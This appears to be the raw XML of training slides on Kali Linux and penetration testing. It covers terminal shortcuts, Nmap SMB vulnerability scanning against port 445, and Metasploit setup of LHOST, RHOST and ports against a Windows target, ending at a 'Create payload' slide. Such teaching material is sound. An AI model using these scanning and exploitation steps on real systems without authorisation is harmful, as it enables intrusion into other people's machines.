            <a:ext cx="36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script in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>namp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24733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9EE5CE-C087-E2C4-7416-425C45C8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D7CF5AD-26B9-2AB2-A978-D87852AC4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67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E400BD6-BEFD-A057-B86F-2D82BC5FDB93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C5E49B9-2BDC-B0EC-68AE-C8228A5D2C8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58004B3-E7E7-8476-3EB3-0B11A09D11E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127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0FEE6F7-813B-419B-07B6-873360F4C907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4DFB81B0-4329-B2F9-88D1-74E8D3B72D6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9F5ED261-EC3E-2763-0A26-3FF515E689B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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1D4B0443-5B3C-E5A7-C72B-29A73194FD00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A56F3AE2-2E68-4E7C-9CFE-E69376F17862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22DB9FF4-9AD6-DD04-4484-5DB665ECFE2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62893913-D99E-8960-05E6-F689A6EC9227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Metasploit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3A059B13-7C9E-0D7E-6FDD-DCC558B8A475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A50AC373-CAA5-246A-68B2-B2272790D8B5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127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B2390FD2-3A70-B89B-609C-7264E0673271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3.2  Scan Vulnerability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EBEB80B5-B692-60CB-B039-9AA3E5B4811C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>plocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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86410A-4D59-C808-23DB-32432ED4DD23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2363160" y="2108465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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C237708-83C0-2229-0951-4E63948BB5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4093594" y="1905189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vulnerability .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  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2E05D175-5B9D-9E9D-E3DE-CA4DC0964463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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plocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      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9DD3BE-DCF0-CCFC-260C-4C9740D182B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3442529" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{935AD0E6-C0B7-F862-207A-0D9A961DF898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955401" y="2329984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all script to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> protocol</a:t>
            </a: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344FDA92-41EC-0228-0AAC-66BC966BCE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-761" y="2724150"/>
            <a:ext cx="49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 err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" altLang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>smb-vul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" altLang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> –p 445 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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570030-1802-DF8E-6BE9-D5B133AF9D7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4718879" y="2969073"/>
            <a:ext cx="5366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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A7A081-377F-80FE-527E-2E9EC515E863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303420" y="2720442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vuln in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> protocol </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC603D52-0E50-2CC8-2533-26C46ED4D36B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3184323"/>
            <a:ext cx="331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use id vuln </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07C95B5-3722-17C0-34BC-A841991AD46C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379301" y="3209200"/>
            <a:ext cx="36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vuln in the windows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A50530F-5A44-F080-DF05-BDBAE4917787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2675890" y="3406186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5251631-423F-D506-2C52-90449EC3CC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945447" y="3835764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2" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4BA074-D721-6262-B788-C0CA25BD4F0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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-show options   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6EFF0D-BB49-80F8-7546-1B1F314BB0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339057" y="3661575"/>
            <a:ext cx="36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 details in the vuln </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137420546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2B1678-330D-27BE-A36E-B0ED920C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D5DE44-FB86-6A79-48C9-6FA52E033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69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E73BBFB-75FA-481C-E4C9-0FD1476CD347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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2CF5909-1A9A-C6B8-6DA3-EA379C95EAB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27955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33F3219-70E5-5EAB-75C2-5170BD1D814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27955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128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DE3802A5-485A-50A0-73A0-35EE94B74D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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2E52D823-DF8E-8381-C5D4-20FFC34BC3C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06CC959D-27D3-21ED-7F27-42BFAE152F00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886" y="103479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998B6BC5-EBD1-09B6-E438-349ED8F730B9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839BF97C-E3B6-A423-351B-99531BE20E47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2BB2CE68-D7AE-3600-600F-2E9B1E785DF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F5875CC3-88DC-850B-8E09-39030FB45130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Metasploit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F30604B5-9B72-7626-61BB-AC73B7260ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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93CC5D11-1F7A-FB73-A3AC-FA6E9BF358C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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128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D0B83589-37E6-E607-752B-0CA2B056CADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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3.2  Scan Vulnerability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2DBD9D79-01CE-A4E8-9206-CB39690A25C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485185" y="1915698"/>
            <a:ext cx="29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-set LHOST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F4C44A-5475-B008-B8FB-27BA9C312123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2380762" y="2108465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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641F4A15-81A4-8593-73A8-8FDA387B803C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4111196" y="1905189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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali 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599D30E1-1E68-F050-AAC5-ABBF7A96918A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627201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-set RHOST       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FA4260-7B82-B616-E2BA-585967EC1B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A905FA8-2B4A-EFCD-16A6-495C3E904C53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973003" y="2329984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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> windows</a:t>
            </a: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0497530B-CBE5-CC2D-8808-FE1CE310FD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16841" y="2724150"/>
            <a:ext cx="49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-set LPORT/RPORT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8CAC3C-1DFA-547F-A76C-28B0AE0A1F1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3191793" y="2927552"/>
            <a:ext cx="5366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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF877ABC-ADEC-2735-369E-2462A493CD27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986698" y="2726991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ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2585C6F8-20CD-28DB-4CD5-8AD381EF2BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627202" y="3184323"/>
            <a:ext cx="331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use id vuln </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF89C163-E729-329D-4905-73C4C0909E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396903" y="3209200"/>
            <a:ext cx="36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vuln in the windows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8B41561-437B-8A20-C694-9EA9BC75EE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2693492" y="3406186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64FE7E-D2DF-12FE-2EFD-1B3F7CBC2595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963049" y="3835764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2" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F6029B-C716-1D9B-6CC3-FAD90B364842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627202" y="3603453"/>
            <a:ext cx="30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-show options   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C5C510-A504-2BA3-7107-B5C13F09BEBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356659" y="3661575"/>
            <a:ext cx="36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 details in the vuln </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352615389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4101F8E-1F96-BCF4-EB8E-A94EED8F2598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6983476" y="185828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JO" sz="3600" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>3.2</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="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81DFBFD-8233-2C63-B71D-31482BB3BA74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769361" y="4766051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46D79042-56A3-D4AC-C1CE-99BE5B35B288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769361" y="4776697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129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8E4EE79-6B42-8E54-B7A3-F37357D62F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1849546"/>
            <a:ext cx="533146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336550" lvl="1">
              <a:tabLst>
                <a:tab pos="688340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Create payload </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369637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EFE9-1E0F-E850-9C04-8C819685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0D985-E7A2-78D8-E152-D4B7F4A05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3029CCB-A3A2-15EE-36EE-ADFB46668613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2244122-4D2C-C6CD-7F6F-ED141F2EE0F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0C69B03-8451-C5BD-42DC-384CDC8B0EB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89A9E66-37D6-11A3-E73F-8E5BABC540BF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878D0106-2E55-346F-DE97-136DABBD7B0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E60D4836-ED0A-78A8-D8A7-0072EEBF1B08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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7010ED03-4C2D-BB54-0C50-948036F59318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F0FAB433-2A3E-63EE-7A8A-E4E9276BF828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7CCED547-33A0-A57A-8B41-EFF6A2B344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F8C25649-2E48-A266-8FB4-62B01D4635FC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015880DE-3539-69F2-2F64-E4AEE143AA84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FF4F3084-16CD-84DC-0FB9-7089A1BB4A22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</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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3251C89-7CBA-166D-BEC5-F9EC5F08A2E8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7422590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1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>Important abbreviations in Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>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615A7B6F-8992-2AF1-7FC8-2EC834E1A466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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- Ctrl + Shift + C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6FE75A-A3E7-6CE1-C92A-C5692B70600C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589007" y="2079409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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D692273C-F0A9-E6C0-FB32-27009B66AB11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4513363" y="1876878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in Terminal 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85BC2B01-6CEF-5E2E-705E-AC2ED54382AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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Ctrl + C     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3CC464-64BD-17B1-6EA4-D844BE0A2F47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094190" y="2511361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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0DA31F-9D94-FB6F-15A9-578BBC319DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139996" y="2313214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out Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293B9689-8E5B-CAE2-E7B7-89D2C11C36E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150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 Ctrl + Shift + V   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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19D340-6BB8-ADE3-27F1-4EC5DC400853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612097" y="2926327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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4ECA2F-434E-892C-3582-7C4E884636D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137254" y="2749550"/>
            <a:ext cx="3113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Paste in Terminal </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A1FAA5-9514-9921-84CE-DE31A22A1173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="3184323"/>
            <a:ext cx="331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 Ctrl + V</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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84513B41-F248-CD9F-BDC3-DB65AB6478EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3969298" y="3214963"/>
            <a:ext cx="300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Paste out Terminal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5DEC06-A5FF-F94B-ECDE-531456E3E46C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411184" y="3418859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1FC375-9F6B-520E-7D72-F344C40D945B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945447" y="3835764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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8C5FF2-22D1-959B-EAD0-E572DBCCFCEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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- Ctrl + Shift + L   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
